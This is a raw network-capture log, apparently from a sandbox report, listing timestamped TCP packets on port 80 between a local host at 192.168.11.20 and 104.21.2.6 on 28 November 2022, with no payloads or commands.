                                                                    Nov 28, 2022 16:37:03.865051031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.865061045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.865072012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.865081072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.865355015 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.865848064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866072893 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.866103888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866117001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866130114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866141081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866152048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866162062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866173029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866183043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866219044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866231918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866260052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866285086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866298914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866309881 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866319895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866328955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.866384983 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.866384983 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.866511106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.872267962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.872426987 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.872607946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.872632980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.872828007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.872828007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.882829905 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.891808033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891870975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891884089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891896009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891907930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891927004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891938925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891949892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891962051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891976118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891988039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.891999006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892010927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892023087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892034054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892045975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892056942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892164946 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.892261982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892272949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892283916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892294884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892308950 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.892308950 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.892318964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892332077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892362118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892373085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892396927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892410040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892421007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892431974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892441988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892452955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892477989 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.892568111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892579079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892590046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892600060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892611027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892621994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892632008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892642975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892647028 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.892658949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892669916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892680883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892690897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892702103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892713070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892723083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892734051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892745018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892755032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892765999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892826080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.892988920 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.893115997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.893126965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.893137932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.893148899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.893157005 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.893162966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.893522024 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.898567915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898658037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898669958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898680925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898694038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898746967 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.898767948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898886919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898941040 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.898941040 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.898962975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.898973942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.899096012 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.899240971 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.930128098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.933918953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934066057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934068918 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.934084892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934096098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934108019 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934119940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934130907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934142113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934153080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934164047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934190989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934201002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934211969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934223890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934233904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934245110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934256077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934273958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934281111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.934281111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.934292078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934300900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.934540987 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.934752941 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947115898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947249889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947263956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947278976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947289944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947300911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947310925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947314978 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947329044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947339058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947350025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947360992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947371960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947382927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947392941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947403908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947415113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947426081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947437048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947447062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947458029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947530985 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947530985 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947679996 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947710037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947722912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947732925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947743893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947755098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947763920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947774887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947786093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947796106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947807074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947817087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947827101 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947827101 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947837114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947848082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947858095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947869062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947879076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947890043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947901011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947911024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947921991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947947979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947958946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947969913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947981119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947992086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.947997093 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.947997093 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948010921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948021889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948031902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948043108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948054075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948064089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948072910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948203087 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948203087 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948374987 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948535919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948553085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948565006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948575020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948585987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948720932 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948795080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948807001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948817015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948827982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948838949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948849916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948859930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948870897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948880911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948892117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948903084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948913097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948924065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948935032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948945045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948950052 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.948961973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948972940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948982954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.948993921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949004889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949014902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949026108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949037075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949074030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949084997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949120045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.949120045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.949120045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.949290991 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.949356079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949368000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949378967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949388981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949495077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949506044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949517965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949528933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949537992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.949847937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.964982033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965074062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965087891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965197086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965342045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965406895 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965406895 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965439081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965451956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965464115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965490103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965514898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965527058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965537071 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965543985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965568066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965579987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965590000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965600967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965611935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965622902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965634108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965645075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965656042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965666056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965689898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965702057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965707064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965707064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965707064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965722084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965734005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965744972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965755939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965780020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965795040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965954065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965954065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.965972900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965986967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.965997934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.966010094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.966021061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.966029882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.966257095 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968000889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968122959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968148947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968178034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968189001 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968195915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968208075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968219042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968230963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968241930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968252897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968264103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968275070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968286991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968297958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968318939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968343019 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968353033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.968359947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968359947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968359947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968528986 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.968882084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969006062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969019890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969031096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969050884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969075918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969090939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.969125032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969136953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969137907 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.969151974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969176054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969187021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969198942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969209909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969221115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969232082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969242096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969252110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.969341040 CET4983080192.168.11.20104.21.2.6
